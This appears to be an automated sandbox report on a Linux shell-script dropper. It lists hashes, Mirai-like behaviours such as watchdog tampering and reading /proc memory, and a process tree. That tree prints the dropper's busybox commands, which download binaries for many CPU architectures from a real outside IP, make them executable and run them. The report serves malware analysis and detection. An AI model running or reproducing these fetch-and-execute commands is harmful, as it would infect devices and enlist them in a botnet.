Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-11-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh
-
Size
1KB
-
MD5
476467eba539be5db3022f1ebde08841
-
SHA1
6fc462604c405f96b0823e2baa077f150b1bb33f
-
SHA256
a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b
-
SHA512
c6fe968567d3e60e8ecef1152c1a389c40245ce0b9a73880a2ff895443bc272000bf76b78c252c646a4a7f737a8564476740fa82792ca9847aa1071f28e47234
Malware Config
Signatures
-
Contacts a large (62273) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 665 busybox 710 busybox 731 busybox 740 busybox 745 busybox 680 busybox 717 busybox 722 busybox 726 busybox 736 busybox 750 busybox 754 busybox -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/jklarm 667 jklarm /tmp/jklarm5 681 jklarm5 /tmp/jklarm6 711 jklarm6 -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jklarm5 File opened for modification /dev/misc/watchdog jklarm5 File opened for modification /dev/watchdog jklarm File opened for modification /dev/misc/watchdog jklarm -
Renames itself 2 IoCs
pid Process 667 jklarm 681 jklarm5 -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 194.36.144.87 Destination IP 51.158.108.203 -
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jklarm File opened for reading /proc/net/tcp jklarm5 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 64 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/748/maps jklarm5 File opened for reading /proc/762/maps jklarm5 File opened for reading /proc/765/maps jklarm5 File opened for reading /proc/785/maps jklarm5 File opened for reading /proc/810/maps jklarm5 File opened for reading /proc/824/maps jklarm5 File opened for reading /proc/833/maps jklarm5 File opened for reading /proc/739/maps jklarm5 File opened for reading /proc/744/maps jklarm5 File opened for reading /proc/778/maps jklarm5 File opened for reading /proc/813/maps jklarm5 File opened for reading /proc/717/maps jklarm5 File opened for reading /proc/721/maps jklarm5 File opened for reading /proc/750/maps jklarm5 File opened for reading /proc/760/maps jklarm5 File opened for reading /proc/736/maps jklarm5 File opened for reading /proc/791/maps jklarm5 File opened for reading /proc/809/maps jklarm5 File opened for reading /proc/734/maps jklarm5 File opened for reading /proc/817/maps jklarm5 File opened for reading /proc/716/maps jklarm5 File opened for reading /proc/720/maps jklarm5 File opened for reading /proc/731/maps jklarm5 File opened for reading /proc/735/maps jklarm5 File opened for reading /proc/770/maps jklarm5 File opened for reading /proc/781/maps jklarm5 File opened for reading /proc/798/maps jklarm5 File opened for reading /proc/805/maps jklarm5 File opened for reading /proc/763/maps jklarm5 File opened for reading /proc/782/maps jklarm5 File opened for reading /proc/828/maps jklarm5 File opened for reading /proc/732/maps jklarm5 File opened for reading /proc/749/maps jklarm5 File opened for reading /proc/768/maps jklarm5 File opened for reading /proc/779/maps jklarm5 File opened for reading /proc/792/maps jklarm5 File opened for reading /proc/843/maps jklarm5 File opened for reading /proc/726/maps jklarm5 File opened for reading /proc/764/maps jklarm5 File opened for reading /proc/801/maps jklarm5 File opened for reading /proc/821/maps jklarm5 File opened for reading /proc/725/maps jklarm5 File opened for reading /proc/741/maps jklarm5 File opened for reading /proc/745/maps jklarm5 File opened for reading /proc/834/maps jklarm5 File opened for reading /proc/803/maps jklarm5 File opened for reading /proc/811/maps jklarm5 File opened for reading /proc/841/maps jklarm5 File opened for reading /proc/844/maps jklarm5 File opened for reading /proc/829/maps jklarm5 File opened for reading /proc/832/maps jklarm5 File opened for reading /proc/789/maps jklarm5 File opened for reading /proc/808/maps jklarm5 File opened for reading /proc/816/maps jklarm5 File opened for reading /proc/839/maps jklarm5 File opened for reading /proc/758/maps jklarm5 File opened for reading /proc/772/maps jklarm5 File opened for reading /proc/793/maps jklarm5 File opened for reading /proc/831/maps jklarm5 File opened for reading /proc/755/maps jklarm5 File opened for reading /proc/800/maps jklarm5 File opened for reading /proc/818/maps jklarm5 File opened for reading /proc/719/maps jklarm5 File opened for reading /proc/743/maps jklarm5 -
Changes its process name 2 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 667 jklarm Changes the process name, possibly in an attempt to hide itself 681 jklarm5 -
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jklarm5 File opened for reading /proc/net/tcp jklarm -
description ioc Process File opened for reading /proc/758/cmdline jklarm5 File opened for reading /proc/844/cmdline jklarm5 File opened for reading /proc/290/status jklarm File opened for reading /proc/463/status jklarm5 File opened for reading /proc/786/cmdline jklarm5 File opened for reading /proc/647/status jklarm5 File opened for reading /proc/719/cmdline jklarm5 File opened for reading /proc/736/cmdline jklarm5 File opened for reading /proc/762/cmdline jklarm5 File opened for reading /proc/785/cmdline jklarm5 File opened for reading /proc/169/status jklarm5 File opened for reading /proc/406/status jklarm5 File opened for reading /proc/771/cmdline jklarm5 File opened for reading /proc/795/cmdline jklarm5 File opened for reading /proc/647/status jklarm File opened for reading /proc/663/status jklarm5 File opened for reading /proc/819/cmdline jklarm5 File opened for reading /proc/822/cmdline jklarm5 File opened for reading /proc/832/cmdline jklarm5 File opened for reading /proc/836/cmdline jklarm5 File opened for reading /proc/291/status jklarm File opened for reading /proc/663/status jklarm File opened for reading /proc/260/status jklarm5 File opened for reading /proc/748/cmdline jklarm5 File opened for reading /proc/766/cmdline jklarm5 File opened for reading /proc/811/cmdline jklarm5 File opened for reading /proc/290/status jklarm5 File opened for reading /proc/419/status jklarm5 File opened for reading /proc/720/cmdline jklarm5 File opened for reading /proc/773/cmdline jklarm5 File opened for reading /proc/791/cmdline jklarm5 File opened for reading /proc/818/cmdline jklarm5 File opened for reading /proc/837/cmdline jklarm5 File opened for reading /proc/731/cmdline jklarm5 File opened for reading /proc/752/cmdline jklarm5 File opened for reading /proc/793/cmdline jklarm5 File opened for reading /proc/796/cmdline jklarm5 File opened for reading /proc/724/cmdline jklarm5 File opened for reading /proc/761/cmdline jklarm5 File opened for reading /proc/781/cmdline jklarm5 File opened for reading /proc/804/cmdline jklarm5 File opened for reading /proc/344/status jklarm File opened for reading /proc/671/status jklarm File opened for reading /proc/749/cmdline jklarm5 File opened for reading /proc/769/cmdline jklarm5 File opened for reading /proc/827/cmdline jklarm5 File opened for reading /proc/831/cmdline jklarm5 File opened for reading /proc/463/status jklarm File opened for reading /proc/300/status jklarm5 File opened for reading /proc/344/status jklarm5 File opened for reading /proc/729/cmdline jklarm5 File opened for reading /proc/800/cmdline jklarm5 File opened for reading /proc/815/cmdline jklarm5 File opened for reading /proc/823/cmdline jklarm5 File opened for reading /proc/841/cmdline jklarm5 File opened for reading /proc/270/status jklarm File opened for reading /proc/790/cmdline jklarm5 File opened for reading /proc/839/cmdline jklarm5 File opened for reading /proc/656/status jklarm File opened for reading /proc/738/cmdline jklarm5 File opened for reading /proc/742/cmdline jklarm5 File opened for reading /proc/779/cmdline jklarm5 File opened for reading /proc/783/cmdline jklarm5 File opened for reading /proc/797/cmdline jklarm5 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 725 busybox 727 jklmips 728 busybox -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox File opened for modification /tmp/jklarm6 busybox
Processes
-
/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh/tmp/a09cecfb202533bf5bcb0566dce4c9e9f8273d06a153613ba8f291dbc05f496b.sh1⤵PID:654
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:657
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:665
-
-
/tmp/jklarm./jklarm NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:667
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:669
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:672
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/jklarm5./jklarm5 NewTel2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:681
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:703
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:705
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/jklarm6./jklarm6 NewTel2⤵
- Executes dropped EXE
PID:711
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:712
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarm7 -O jklarm72⤵PID:716
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/jklarm7./jklarm7 NewTel2⤵PID:718
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:720
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklm68k -O jklm68k2⤵PID:721
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/jklm68k./jklm68k NewTel2⤵PID:723
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:724
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmips -O jklmips2⤵
- System Network Configuration Discovery
PID:725
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/jklmips./jklmips NewTel2⤵
- System Network Configuration Discovery
PID:727
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklmpsl -O jklmpsl2⤵PID:730
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/jklmpsl./jklmpsl NewTel2⤵PID:733
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:734
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklppc -O jklppc2⤵PID:735
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/jklppc./jklppc NewTel2⤵PID:737
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:738
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklsh4 -O jklsh42⤵PID:739
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/jklsh4./jklsh4 NewTel2⤵PID:742
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:743
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklspc -O jklspc2⤵PID:744
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/jklspc./jklspc NewTel2⤵PID:747
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:748
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklx86 -O jklx862⤵PID:749
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/jklx86./jklx86 NewTel2⤵PID:751
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵PID:752
-
-
/bin/busybox/bin/busybox wget http://45.125.66.203/jklarc -O jklarc2⤵PID:753
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/jklarc./jklarc NewTel2⤵PID:756
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵PID:757
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵PID:758
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5ccc0e90e52316a5e000734aa3ab7ccdb
SHA138974e871dea717ef4d69f3f7644284a1b2a7110
SHA256e3ad3137e9ffc774a2916f5e329689397fc156318c21d5429089e24c3df6536a
SHA512247073ec1f9b19ff2349cc4f67b05e01fc7ce472aef06851ca272c756e439205631c7fe26112cc01db9149e83af550ea5666876bd9b06ca44255ecb4d35e5c1c
-
Filesize
61KB
MD55d2923d3bb5d7daf3c286d3de1c69842
SHA1c761cc78bd7c286b8a95701c8a6c215b0ed7a41f
SHA2564b36c1e443a9b1f76c30d9e4c240cf11ba7728ef0ffb83965fe31720e7c5633e
SHA512593fb52539469a132036265869082eda84b86f4c63937f74b37efa3023a4e8b5b47cdbdcabc13c1257714762c6c25a7305f743dee5ab8c8ef55d64a64f28cda2
-
Filesize
70KB
MD5bd890549b6469679c05204c8893564d9
SHA18e4655e1e4514fc49e19d914ce0e6d482dfe2d71
SHA256e5369f948a5f127f736149c3ba45bb65d0cc463d95bdda10ae4ba428484d43a2
SHA5128cad0724fd27828f29217ebf871975a429e5192427e24390de26d234352ca8d3b429969e27220bee03cd0376613e6e69e01471c5b88e1a074857bcec522ae5c4